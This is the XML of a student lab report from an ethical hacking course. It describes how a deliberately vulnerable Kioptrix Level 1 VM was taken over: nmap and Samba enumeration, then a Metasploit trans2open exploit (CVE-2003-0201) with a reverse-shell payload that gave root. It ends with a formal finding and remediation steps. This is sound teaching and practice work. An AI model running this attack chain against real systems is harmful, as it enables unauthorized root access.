        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 4.1.3 — Root shell: whoami / id / uname -a / cat /etc/redhat-release</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5B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="18"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FAFCFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami → root: повний root-доступ отримано без жодних облікових даних.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id → uid=0(root) gid=0(root) groups=0(root),...: підтверджено найвищі привілеї.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">uname -a → Linux kioptrix.example.com 2.4.7-10 — ядро 2001 року, x86.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/redhat-release → Red Hat Linux release 7.2 (Enigma) — ОС підтверджена.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ланцюжок атаки: nmap виявив Samba 2.2.1a → CVE-2003-0201 → Metasploit trans2open → root shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="14"/>
        </w:pBdr>
        <w:shd w:fill="EBF3FB" w:val="clear"/>
        <w:spacing w:after="60" w:before="180"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Завдання 4.2 — Професійний Finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (8 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Компонент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Деталі</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Назва з CVE</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Samba 2.2.1a Remote Buffer Overflow via trans2open (CVE-2003-0201)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Докази (Evidence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>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Успішна експлуатація через Metasploit exploit/linux/samba/trans2open з payload linux/x86/shell_reverse_tcp. Підтверджено командою whoami → root, id → uid=0. Сесія відкрита 10.04.2026 09:47 UTC.</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Вплив (Impact)</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КРИТИЧНИЙ. Зловмисник без жодних облікових даних отримує повний root-доступ до фінансового сервера. Наслідки: (1) повний доступ до фінансових даних клієнтів та транзакцій; (2) можливість встановити бекдори та APT-присутність; (3) використання як точки опори для атаки на внутрішню мережу (lateral movement); (4) порушення нормативних вимог PCI DSS, SOX, GDPR з ризиком штрафів та репутаційних збитків.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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Впевненість (Confidence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7026"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0F7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Confirmed — вразливість успішно експлуатована з отриманням root shell. PoC задокументований на рис. 4.1.2 та 4.1.3.</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Рекомендації</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spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. НЕГАЙНО ізолювати сервер від мережі до проведення оновлень.
2. Оновити Samba до актуальної версії (≥ 4.x) або замінити сервер сучасним.
3. Оновити всі компоненти: Apache → 2.4.x, OpenSSL → 3.x, OpenSSH → 9.x.
4. Перевірити всі облікові записи (john, harold) — можливо, паролі вже скомпрометовані.
5. Провести forensic-аналіз логів для визначення, чи вже був несанкціонований доступ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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C00000" w:sz="1"/>
              <w:left w:val="single" w:color="C00000" w:sz="18"/>
              <w:bottom w:val="single" w:color="C00000" w:sz="1"/>
              <w:right w:val="single" w:color="C00000" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEBEE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Для нетехнічного менеджера: застарілий сервер у внутрішній мережі компанії виявився вразливим до атаки, яка не потребує ніяких паролів. Зловмисник може отримати повний контроль над сервером та всіма даними на ньому за лічені хвилини. Сервер слід негайно відключити від мережі та замінити.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Висновки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">У ході виконання лабораторної роботи № 5 «Перелік сервісів та експлуатація невідомої цілі» (Kioptrix Level 1) був успішно виконаний повний цикл пентестингу від розгортання до root-доступу:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Розгортання та розвідка: Kioptrix Level 1 розгорнуто у VirtualBox (Host-Only 192.168.56.102). netdiscover виявив IP. Nmap -sV -sC -O виявив 6 сервісів: SSH 2.9p2, Apache 1.3.20 + mod_ssl 2.8.4, rpcbind, Samba 2.2.1a, HTTPS. Система ідентифікована як Red Hat Linux 7.2 (ядро 2.4.7-10, ~2001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ручний перелік: Netcat банери підтвердили версії SSH та HTTP. GET-запит через nc розкрив повний Server header з версіями Apache/mod_ssl/OpenSSL. Чотири SMB-методи визначили Samba 2.2.1a: smbclient (ресурси), enum4linux (версія + users: root/john/harold), Nmap NSE (shares + users), Metasploit smb_version (фінальне підтвердження).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Ідентифікація вразливостей: Nikto (80 та 443) підтвердив CVE-2002-0082 (mod_ssl). Nmap --script vuln виявив SSHv1, SSL CCS Injection, SMB DoS. Таблиця CVE: два шляхи з CVSS 10.0 — Samba trans2open (CVE-2003-0201) та mod_ssl OpenFuck (CVE-2002-0082).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Експлуатація: Спроба OpenFuck провалилась через несумісність OpenSSL API (задокументована невдача). Успішна експлуатація — Metasploit trans2open з payload linux/x86/shell_reverse_tcp → root shell підтверджено командами whoami/id/uname -a.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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E7D32" w:sz="1"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="18"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="1"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ланцюжок атаки: netdiscover (IP) → nmap (сервіси) → nc/enum4linux (банери/Samba версія) → Nikto (CVE-2002-0082) → CVE mapping (trans2open пріоритет 1) → OpenFuck fail (невдача) → Metasploit trans2open → root.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ключовий урок: OpenFuck потребує сумісного середовища OpenSSL — у реальному пентесті без правильного tooling exploit може не спрацювати навіть для підтвердженої вразливості.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>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jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Лабораторна робота 5  |  Білозор Д.О.  |  Стор.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pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">EGR6301 — Етичний хакінг — Лабораторна робота №5 — IITU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9f2c2b6f6e99f8c1704ca63cb03a12c2d9a1a4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b12bc9469198aa942bcacb1ddaf296e7b7e8311d.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c25edfd9dd43112c5f7bb8c0d533dc4c8bf4474f.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/02c00c81de5fd46db848ad83ff298268634c31ef.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/fba3f8220c16771bae26804e481ff8d1c37eb48a.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/02fde930d0161310feb14c81f11e4f6672cee6f5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/963fcaabfa540e2cb4dabf1457e095d03f46099d.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/03b45cb7280b11538b363fc58ba5c4e51c44669a.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5fc05e7c1f7b099f11303f83371435be82bd6c02.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5f8de5ec06a95dda67db746b44c907713d528a0e.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/edbb78e02cafb2bec12541bd899529ed7cdf6c2a.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/73fc0ef11aff6d6e7194bc485620369e92d14461.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/76a2a23e9043542f383a2e8103ed563ec9d0a4ec.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8f91ee280025e8dc00303f2ec3872859ccd67391.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5329310b42920636e08713d42d1e75dcaa958e34.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Report 5 — Kioptrix Level 1 — Root</dc:title>
  <dc:creator>Dmytro Bilozor</dc:creator>
  <dc:description>EGR6301 Ethical Hacking Lab 5</dc:description>
  <cp:lastModifiedBy>Dmytro Bilozor</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-10T12:55:23.179Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-10T12:55:23.179Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>